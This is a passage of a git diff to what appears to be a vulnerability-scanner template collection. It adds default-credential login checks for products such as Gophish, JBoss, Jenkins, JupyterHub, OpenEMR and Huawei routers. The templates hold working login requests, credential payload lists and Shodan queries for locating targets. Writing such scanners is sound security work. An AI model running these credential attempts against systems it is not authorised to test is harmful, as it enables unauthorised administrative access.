+68,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/03 diff --git a/default-logins/google/google-earth-dlogin.yaml b/default-logins/google/google-earth-dlogin.yaml index 8e29091076..ae7bc0bc25 100644 --- a/default-logins/google/google-earth-dlogin.yaml +++ b/default-logins/google/google-earth-dlogin.yaml @@ -4,10 +4,23 @@ info: name: Google Earth Enterprise Default Login author: orpheus,johnjhacking severity: high - tags: default-login,google - reference: https://www.opengee.org/geedocs/5.2.2/answer/3470759.html + description: | + Google Earth Enterprise default login credentials were discovered. + reference: + - https://johnjhacking.com/blog/gee-exploitation/ + - https://www.opengee.org/geedocs/5.2.2/answer/3470759.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + remediation: | + To reset the username and password: + + sudo /opt/google/gehttpd/bin/htpasswd -c + /opt/google/gehttpd/conf.d/.htpasswd geapacheuse" metadata: - shodan-query: 'title:"GEE Server"' + shodan-query: title:"GEE Server" + tags: default-login,google-earth requests: - raw: @@ -34,4 +47,6 @@ requests: condition: and words: - 'DashboardPanel' - - 'Earth Enterprise Server' \ No newline at end of file + - 'Earth Enterprise Server' + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/gophish/gophish-default-login.yaml b/default-logins/gophish/gophish-default-login.yaml new file mode 100644 index 0000000000..517201be20 --- /dev/null +++ b/default-logins/gophish/gophish-default-login.yaml @@ -0,0 +1,55 @@ +id: gophish-default-login + +info: + name: Gophish < v0.10.1 Default Credentials + author: arcc,dhiyaneshDK + severity: high + description: For versions of Gophish > 0.10.1, the temporary administrator credentials are printed in the logs when you first execute the Gophish binary. + reference: + - https://docs.getgophish.com/user-guide/getting-started + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: gophish,default-login + +requests: + - raw: + - | + GET /login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{user}}&password={{pass}}&csrf_token={{replace(url_encode(html_unescape(csrf_token)), "+", "%2B")}} + + attack: pitchfork + payloads: + user: + - admin + pass: + - gophish + + cookie-reuse: true + extractors: + - type: regex + name: csrf_token + part: body + internal: true + group: 1 + regex: + - 'name="csrf_token" value="(.+?)"' + + matchers: + - type: dsl + dsl: + - "!contains(tolower(all_headers), 'location: /login')" + - "contains(tolower(all_headers), 'location: /')" + - "contains(tolower(all_headers), 'gophish')" + - "status_code==302" + condition: and + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/grafana/grafana-default-login.yaml b/default-logins/grafana/grafana-default-login.yaml index 125010431f..c6f47b7acd 100644 --- a/default-logins/grafana/grafana-default-login.yaml +++ b/default-logins/grafana/grafana-default-login.yaml @@ -4,11 +4,16 @@ info: name: Grafana Default Login author: pdteam severity: high - tags: grafana,default-login + description: Grafana default admin login credentials were detected. reference: - https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection - https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page - https://github.com/grafana/grafana/issues/14755 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: grafana,default-login requests: - raw: @@ -35,14 +40,16 @@ requests: matchers: - type: word words: - - "grafana_session" # Login cookie + - "grafana_session" # Login cookie part: header - type: word part: body words: - - "Logged in" # Logged in keyword + - "Logged in" # Logged in keyword - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/guacamole/guacamole-default-login.yaml b/default-logins/guacamole/guacamole-default-login.yaml index 3ab8960dd6..706089ea58 100644 --- a/default-logins/guacamole/guacamole-default-login.yaml +++ b/default-logins/guacamole/guacamole-default-login.yaml @@ -4,8 +4,14 @@ info: name: Guacamole Default Login author: r3dg33k severity: high + description: Guacamole default admin login credentials were detected. + reference: + - https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: guacamole,default-login - reference: https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22. requests: - raw: @@ -41,4 +47,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/hongdian/hongdian-default-login.yaml b/default-logins/hongdian/hongdian-default-login.yaml index a1549c0fa0..56fe4e96b0 100644 --- a/default-logins/hongdian/hongdian-default-login.yaml +++ b/default-logins/hongdian/hongdian-default-login.yaml @@ -4,6 +4,13 @@ info: name: Hongdian Default Login author: gy741 severity: high + description: Hongdian default login information was detected. + reference: + - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: hongdian,default-login requests: @@ -46,3 +53,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/hortonworks/smartsense-default-login.yaml b/default-logins/hortonworks/smartsense-default-login.yaml index 0bddf7fce8..3fa5ac2349 100644 --- a/default-logins/hortonworks/smartsense-default-login.yaml +++ b/default-logins/hortonworks/smartsense-default-login.yaml @@ -4,8 +4,13 @@ info: name: HortonWorks SmartSense Default Login author: Techryptic (@Tech) severity: high - description: Default Login of admin:admin on HortonWorks SmartSense application. - reference: https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html + description: HortonWorks SmartSense default admin login information was detected. + reference: + - https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: hortonworks,smartsense,default-login requests: @@ -35,4 +40,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/hp/hp-switch-default-login.yaml b/default-logins/hp/hp-switch-default-login.yaml index 1b5d3bd755..bc37cec117 100644 --- a/default-logins/hp/hp-switch-default-login.yaml +++ b/default-logins/hp/hp-switch-default-login.yaml @@ -1,33 +1,42 @@ -id: hp-switch-default-login -info: - name: HP 1820-8G Switch J9979A Default Credential - author: pussycat0x - severity: high - reference: https://support.hpe.com/hpesc/public/docDisplay?docId=a00077779en_us&docLocale=en_US - metadata: - fofa-query: 'HP 1820-8G Switch J9979A' - tags: default-login,hp - -requests: - - raw: - - | - POST /htdocs/login/login.lua HTTP/1.1 - Host: {{Hostname}} - - username={{username}}&password= - - payloads: - username: - - admin - - matchers-condition: and - matchers: - - type: word - condition: and - words: - - '"redirect": "/htdocs/pages/main/main.lsp"' - - '"error": ""' - - - type: status - status: - - 200 +id: hp-switch-default-login + +info: + name: HP 1820-8G Switch J9979A Default Login + author: pussycat0x + severity: high + description: HP 1820-8G Switch J9979A default admin login credentials were discovered. + reference: + - https://support.hpe.com/hpesc/public/docDisplay?docId=a00077779en_us&docLocale=en_US + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + fofa-query: HP 1820-8G Switch J9979A + tags: default-login,hp + +requests: + - raw: + - | + POST /htdocs/login/login.lua HTTP/1.1 + Host: {{Hostname}} + + username={{username}}&password= + + payloads: + username: + - admin + + matchers-condition: and + matchers: + - type: word + condition: and + words: + - '"redirect": "/htdocs/pages/main/main.lsp"' + - '"error": ""' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/huawei/huawei-HG532e-default-router-login.yaml b/default-logins/huawei/huawei-HG532e-default-router-login.yaml new file mode 100644 index 0000000000..24174f020b --- /dev/null +++ b/default-logins/huawei/huawei-HG532e-default-router-login.yaml @@ -0,0 +1,42 @@ +id: huawei-HG532e-default-login + +info: + name: Huawei HG532e Default Credential + author: pussycat0x + severity: high + description: Huawei HG532e default admin credentials were discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: http.html:"HG532e" + tags: default-login,huawei + +requests: + - raw: + - | + POST /index/login.cgi HTTP/1.1 + Host: {{Hostname}} + Cookie: Language=en; FirstMenu=Admin_0; SecondMenu=Admin_0_0; ThirdMenu=Admin_0_0_0 + Content-Type: application/x-www-form-urlencoded + + Username=user&Password=MDRmODk5NmRhNzYzYjdhOTY5YjEwMjhlZTMwMDc1NjllYWYzYTYzNTQ4NmRkYWIyMTFkNTEyYzg1YjlkZjhmYg%3D%3D + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Set-Cookie: SessionID' + + - type: word + part: body + words: + - "replace" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/ibm/ibm-mqseries-default-login.yaml b/default-logins/ibm/ibm-mqseries-default-login.yaml index 78424d3229..603c3fa6b0 100644 --- a/default-logins/ibm/ibm-mqseries-default-login.yaml +++ b/default-logins/ibm/ibm-mqseries-default-login.yaml @@ -1,44 +1,50 @@ -id: ibm-mqseries-default-login - -info: - name: IBM MQSeries web console default login - author: righettod - severity: high - description: The remote host is running IBM MQ and REST API and is using default credentials. An unauthenticated, remote attacker can exploit this gain privileged or administrator access to the system. - tags: ibm,default-login - reference: - - https://github.com/ibm-messaging/mq-container/blob/master/etc/mqm/mq.htpasswd - - https://vulners.com/nessus/IBM_MQ_DEFAULT_CREDENTIALS.NASL - -requests: - - raw: - - | - POST /ibmmq/console/j_security_check HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{RootURL}}/ibmmq/console/login.html - - j_username={{username}}&j_password={{password}} - - attack: pitchfork - payloads: - username: - - admin - - app - - mqadmin - password: - - passw0rd - - passw0rd - - mqadmin - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "LtpaToken2_" - - - type: status - status: - - 302 \ No newline at end of file +id: ibm-mqseries-default-login + +info: + name: IBM MQSeries Web Console Default Login + author: righettod + severity: high + description: IBM MQ and REST API default admin credentials were discovered. An unauthenticated, remote attacker can exploit this gain privileged or administrator access to the system. + reference: + - https://github.com/ibm-messaging/mq-container/blob/master/etc/mqm/mq.htpasswd + - https://vulners.com/nessus/IBM_MQ_DEFAULT_CREDENTIALS.NASL + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: ibm,default-login + +requests: + - raw: + - | + POST /ibmmq/console/j_security_check HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}}/ibmmq/console/login.html + + j_username={{username}}&j_password={{password}} + + attack: pitchfork + payloads: + username: + - admin + - app + - mqadmin + password: + - passw0rd + - passw0rd + - mqadmin + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "LtpaToken2_" + + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/ibm/ibm-storage-default-credential.yaml b/default-logins/ibm/ibm-storage-default-credential.yaml index 6b2df92269..3db2daacb4 100644 --- a/default-logins/ibm/ibm-storage-default-credential.yaml +++ b/default-logins/ibm/ibm-storage-default-credential.yaml @@ -3,8 +3,15 @@ id: ibm-storage-default-login info: name: IBM Storage Management Default Login author: madrobot - severity: medium - tags: default-login,ibm + severity: high + description: IBM Storage Management default admin login credentials were discovered. + reference: + - https://www.ibm.com/docs/en/power-sys-solutions/0008-ESS?topic=5148-starting-elastic-storage-server-management-server-gui + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: default-login,ibm,storage requests: - raw: @@ -40,3 +47,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/idemia/idemia-biometrics-default-login.yaml b/default-logins/idemia/idemia-biometrics-default-login.yaml index 959da5926b..19d99e5196 100644 --- a/default-logins/idemia/idemia-biometrics-default-login.yaml +++ b/default-logins/idemia/idemia-biometrics-default-login.yaml @@ -3,9 +3,14 @@ id: idemia-biometrics-default-login info: name: IDEMIA BIOMetrics Default Login author: Techryptic (@Tech) - severity: high - description: Default Login of password=12345 on IDEMIA BIOMetrics application. - reference: https://www.google.com/search?q=idemia+password%3D+"12345" + severity: medium + description: IDEMIA BIOMetrics application default login credentials were discovered. + reference: + - https://www.google.com/search?q=idemia+password%3D+"12345" + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 tags: idemia,biometrics,default-login requests: @@ -36,4 +41,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/iptime/iptime-default-login.yaml b/default-logins/iptime/iptime-default-login.yaml index d6a42f5490..0f53e1f827 100644 --- a/default-logins/iptime/iptime-default-login.yaml +++ b/default-logins/iptime/iptime-default-login.yaml @@ -4,6 +4,13 @@ info: name: ipTIME Default Login author: gy741 severity: high + description: ipTIME default admin credentials were discovered. + reference: + - https://www.freewebtools.com/IPTIME/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: iptime,default-login requests: @@ -35,3 +42,5 @@ requests: - "login.cgi" part: body condition: and + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/jboss/jmx-default-login.yaml b/default-logins/jboss/jmx-default-login.yaml new file mode 100644 index 0000000000..43a786abca --- /dev/null +++ b/default-logins/jboss/jmx-default-login.yaml @@ -0,0 +1,47 @@ +id: jmx-default-login + +info: + name: JBoss JMX Console Weak Credential Discovery + author: paradessia + severity: high + description: JBoss JMX Console default login information was discovered. + reference: + - https://docs.jboss.org/jbossas/6/Admin_Console_Guide/en-US/html/Administration_Console_User_Guide-Accessing_the_Console.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: jboss,jmx,default-login + +requests: + - raw: + - | + GET /jmx-console/ HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(user + ':' + pass)}} + + attack: clusterbomb + payloads: + user: + - admin + - root + pass: + - admin + - 12345 + - 123456 + - 1234 + - 123456789 + - 123qwe + - root + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'JMImplementation' + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/jenkins/jenkins-default.yaml b/default-logins/jenkins/jenkins-default.yaml index 2f2d3c8ef9..6409e052da 100644 --- a/default-logins/jenkins/jenkins-default.yaml +++ b/default-logins/jenkins/jenkins-default.yaml @@ -1,51 +1,40 @@ id: jenkins-weak-password info: - name: Jenkins Weak Password + name: Jenkins Default Login author: Zandros0 severity: high + description: Jenkins default admin login information was discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: jenkins,default-login requests: - raw: - | - GET /login HTTP/1.1 + GET / HTTP/1.1 Host: {{Hostname}} - | POST /j_spring_security_check HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Cookie: {{cookie}} - j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in + j_username=admin&j_password=admin&from=%2F&Submit=Sign+in - | GET / HTTP/1.1 Host: {{Hostname}} - Cookie: {{cookie}} - - attack: pitchfork - payloads: - username: - - admin - - jenkins - password: - - admin - - password - - extractors: - - type: regex - name: cookie - internal: true - part: header - regex: - - 'JSESSIONID\..*=([a-z0-9.]+)' + cookie-reuse: true req-condition: true matchers: - type: dsl - condition: and dsl: - 'contains(body_3, "/logout")' - 'contains(body_3, "Dashboard [Jenkins]")' + condition: and + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/jinher-oa-default-login.yaml b/default-logins/jinher-oa-default-login.yaml new file mode 100644 index 0000000000..7c604317dc --- /dev/null +++ b/default-logins/jinher-oa-default-login.yaml @@ -0,0 +1,44 @@ +id: jinher-oa-default-login + +info: + name: Jinher oa C6 Default Password + author: ritikchaddha + severity: high + description: Jinher-OA C6 default administrator account credential. + reference: + - https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E5%92%8COA-C6-default-password.md + tags: jinher,default-login + +requests: + - raw: + - | + POST /c6/Jhsoft.Web.login/AjaxForLogin.aspx HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + type=login&loginCode={{base64("{{username}}")}}&pwd={{base64("{{password}}")}}& + + attack: pitchfork + payloads: + username: + - admin + password: + - "000000" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "\xcf\xb5\xcd\xb3\xb9\xdc\xc0\xed\xd4\xb1\x7c" + - "\xc4\xfa\xba\xc3\x7c\x7c\x7c" + condition: and + + - type: word + part: header + words: + - "SessionIDAdmin=" + + - type: status + status: + - 200 diff --git a/default-logins/jupyterhub/jupyterhub-default-login.yaml b/default-logins/jupyterhub/jupyterhub-default-login.yaml new file mode 100644 index 0000000000..fa7f7c44b0 --- /dev/null +++ b/default-logins/jupyterhub/jupyterhub-default-login.yaml @@ -0,0 +1,41 @@ +id: jupyterhub-default-login + +info: + name: Jupyterhub Default Login + author: For3stCo1d + severity: high + reference: + - https://github.com/jupyterhub/jupyterhub + metadata: + shodan-query: http.title:"JupyterHub" + tags: jupyterhub,default-login + +requests: + - raw: + - | + POST /hub/login?next= HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{user}}&password={{pass}} + + attack: pitchfork + payloads: + user: + - admin + - jovyan + pass: + - admin + - jupyter + + matchers-condition: and + matchers: + - type: dsl + dsl: + - contains(tolower(all_headers), 'jupyterhub-session-id=') + - contains(tolower(all_headers), 'jupyterhub-hub-login=') + condition: and + + - type: status + status: + - 302 \ No newline at end of file diff --git a/default-logins/mantisbt/mantisbt-default-credential.yaml b/default-logins/mantisbt/mantisbt-default-credential.yaml new file mode 100644 index 0000000000..17ceea9753 --- /dev/null +++ b/default-logins/mantisbt/mantisbt-default-credential.yaml @@ -0,0 +1,46 @@ +id: mantisbt-default-credential + +info: + name: MantisBT Default Admin Login + author: For3stCo1d + severity: high + description: A MantisBT default admin login was discovered. + reference: + - https://mantisbt.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: title:"MantisBT" + tags: mantisbt,default-login + +requests: + - raw: + - | + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + return=index.php&username={{user}}&password={{pass}} + + attack: pitchfork + payloads: + user: + - administrator + pass: + - root + + matchers-condition: and + matchers: + - type: dsl + dsl: + - contains(tolower(all_headers), 'mantis_secure_session') + - contains(tolower(all_headers), 'mantis_string_cookie') + condition: and + + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/22 diff --git a/default-logins/minio/minio-default-login.yaml b/default-logins/minio/minio-default-login.yaml index d9338fbaf2..9dce961de7 100644 --- a/default-logins/minio/minio-default-login.yaml +++ b/default-logins/minio/minio-default-login.yaml @@ -4,6 +4,13 @@ info: name: Minio Default Login author: pikpikcu severity: medium + description: Minio default admin credentials were discovered. + reference: + - https://docs.min.io/docs/minio-quickstart-guide.html# + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: default-login,minio requests: @@ -40,3 +47,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/mofi/mofi4500-default-login.yaml b/default-logins/mofi/mofi4500-default-login.yaml new file mode 100644 index 0000000000..a161c4adf5 --- /dev/null +++ b/default-logins/mofi/mofi4500-default-login.yaml @@ -0,0 +1,42 @@ +id: mofi4500-default-login + +info: + name: MOFI4500-4GXeLTE-V2 Default Login + author: pikpikcu + severity: high + description: Mofi Network MOFI4500-4GXELTE wireless router default admin credentials were discovered. + reference: + - https://www.cleancss.com/router-default/Mofi_Network/MOFI4500-4GXELTE + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: mofi,default-login + +requests: + - raw: + - | + POST /cgi-bin/luci/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=root&password=admin + + attack: pitchfork + payloads: + username: + - root + password: + - admin + + matchers-condition: and + matchers: + - type: word + words: + - "MOFI4500 - General - LuCI" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/nagios/nagios-default-login.yaml b/default-logins/nagios/nagios-default-login.yaml index 8fb3713825..3672516797 100644 --- a/default-logins/nagios/nagios-default-login.yaml +++ b/default-logins/nagios/nagios-default-login.yaml @@ -1,10 +1,18 @@ id: nagios-default-login + info: name: Nagios Default Login author: iamthefrogy severity: high + description: Nagios default admin credentials were discovered. + reference: + - https://www.nagios.org + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: nagios,default-login - reference: https://www.nagios.org + requests: - raw: - | @@ -32,3 +40,5 @@ requests: - 'Current Status' - 'Reports' condition: and + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/netsus/netsus-default-login.yaml b/default-logins/netsus/netsus-default-login.yaml new file mode 100644 index 0000000000..1265d06a54 --- /dev/null +++ b/default-logins/netsus/netsus-default-login.yaml @@ -0,0 +1,44 @@ +id: netsus-default-login + +info: + name: NetSUS Server Default Login + author: princechaddha + severity: high + description: NetSUS Server default admin credentials were discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: http.title:"NetSUS Server Login" + tags: netsus,default-login + +requests: + - raw: + - | + POST /webadmin/index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + loginwith=suslogin&username={{username}}&password={{password}}&submit= + attack: pitchfork + payloads: + username: + - webadmin + password: + - webadmin + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Location: dashboard.php' + - 'PHPSESSID=' + condition: and + + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/nexus/nexus-default-login.yaml b/default-logins/nexus/nexus-default-login.yaml index 4decf4e751..e05220ce09 100644 --- a/default-logins/nexus/nexus-default-login.yaml +++ b/default-logins/nexus/nexus-default-login.yaml @@ -4,6 +4,11 @@ info: name: Nexus Default Login author: pikpikcu severity: high + description: Nexus default admin credentials were discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: nexus,default-login requests: @@ -34,3 +39,5 @@ requests: - "NXSESSIONID" part: header condition: and + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/nps/nps-default-login.yaml b/default-logins/nps/nps-default-login.yaml index 5768136961..9de4824223 100644 --- a/default-logins/nps/nps-default-login.yaml +++ b/default-logins/nps/nps-default-login.yaml @@ -4,6 +4,13 @@ info: name: NPS Default Login author: pikpikcu severity: high + description: NPS default admin credentials were discovered. + reference: + - https://docs.microfocus.com/NNMi/10.30/Content/Administer/Hardening/confCC2b_pwd.htm + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: nps,default-login requests: @@ -39,3 +46,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/octobercms-default-login.yaml b/default-logins/octobercms-default-login.yaml new file mode 100644 index 0000000000..ac7530cfa6 --- /dev/null +++ b/default-logins/octobercms-default-login.yaml @@ -0,0 +1,60 @@ +id: octobercms-default-login + +info: + name: OctoberCMS Default Login + author: princechaddha + severity: high + description: OctoberCMS default administrator account credential. + reference: + - https://github.com/octobercms/october + - https://octobercms.com/ + metadata: + verified: true + shodan-query: http.component:"October CMS" + tags: octobercms,default-login,oss + +requests: + - raw: + - | + GET /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + POST /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + _token={{token}}&postback=1&login={{username}}&password={{password}} + + cookie-reuse: true + attack: clusterbomb + payloads: + username: + - admin + password: + - admin + - "" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "october_session=" + - "admin_auth=" + condition: and + + - type: status + status: + - 302 + + extractors: + - type: regex + part: body + name: token + internal: true + group: 1 + regex: + - 'meta name="csrf\-token" content="([A-Za-z0-9]+)">' diff --git a/default-logins/ofbiz/ofbiz-default-login.yaml b/default-logins/ofbiz/ofbiz-default-login.yaml index 4471e1295a..11a9d6b80f 100644 --- a/default-logins/ofbiz/ofbiz-default-login.yaml +++ b/default-logins/ofbiz/ofbiz-default-login.yaml @@ -4,7 +4,14 @@ info: name: Apache OfBiz Default Login author: pdteam severity: medium - tags: ofbiz,default-login + description: Apache OfBiz default admin credentials were discovered. + reference: + - https://cwiki.apache.org/confluence/display/OFBIZ/Apache+OFBiz+Technical+Production+Setup+Guide + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: ofbiz,default-login,apache requests: - raw: @@ -27,4 +34,6 @@ requests: words: - "ofbiz-pagination-template" - "Powered by OFBiz" - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/openemr/openemr-default-login.yaml b/default-logins/openemr/openemr-default-login.yaml new file mode 100644 index 0000000000..5a08aa24f2 --- /dev/null +++ b/default-logins/openemr/openemr-default-login.yaml @@ -0,0 +1,46 @@ +id: openemr-default-login + +info: + name: OpenEMR Default Login + author: Geekby + description: OpenEMR default login was discovered. + severity: high + reference: + - https://github.com/openemr/openemr-devops/tree/master/docker/openemr/6.1.0/#openemr-official-docker-image + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + fofa-query: app="OpenEMR" + shodan-query: http.html:"OpenEMR" + tags: openemr,default-login + +requests: + - raw: + - | + POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_login_session_management=1&languageChoice=1&authUser={{user}}&clearPass={{pass}}&languageChoice=10 + + attack: pitchfork + payloads: + user: + - admin + pass: + - pass + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "main.php?token_main=" + - "OpenEMR" + condition: and + + - type: status + status: + - 302 diff --git a/default-logins/openwrt/openwrt-default-login.yaml b/default-logins/openwrt/openwrt-default-login.yaml new file mode 100644 index 0000000000..a9e9dce71d --- /dev/null +++ b/default-logins/openwrt/openwrt-default-login.yaml @@ -0,0 +1,21 @@ +id: openwrt-default-login + +info: + name: Opentwrt Default Login + author: For3stCo1d + severity: high + reference: + - https://forum.archive.openwrt.org/viewtopic.php?id=16611 + metadata: + shodan-query: http.title:"OpenWrt - LuCI" + tags: openwrt,default-login + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/luci" + + matchers: + - type: word + words: + - 'cgi-bin/luci/admin/system/admin' \ No newline at end of file diff --git a/default-logins/oracle/businessintelligence-default-login.yaml b/default-logins/oracle/businessintelligence-default-login.yaml index a89df1808c..8095ceae03 100644 --- a/default-logins/oracle/businessintelligence-default-login.yaml +++ b/default-logins/oracle/businessintelligence-default-login.yaml @@ -4,6 +4,13 @@ info: name: Oracle Business Intelligence Default Login author: milo2012 severity: high + description: Oracle Business Intelligence default admin credentials were discovered. + reference: + - https://docs.oracle.com/cd/E12096_01/books/AnyDeploy/AnyDeployMisc2.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: oracle,default-login requests: @@ -43,3 +50,5 @@ requests: words: - 'createSessionReturn' part: body + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/others/inspur-clusterengine-default-login.yaml b/default-logins/others/inspur-clusterengine-default-login.yaml new file mode 100644 index 0000000000..bbda3dd5e1 --- /dev/null +++ b/default-logins/others/inspur-clusterengine-default-login.yaml @@ -0,0 +1,45 @@ +id: inspur-clusterengine-default-login + +info: + name: Inspur Clusterengine V4 Default Login + author: 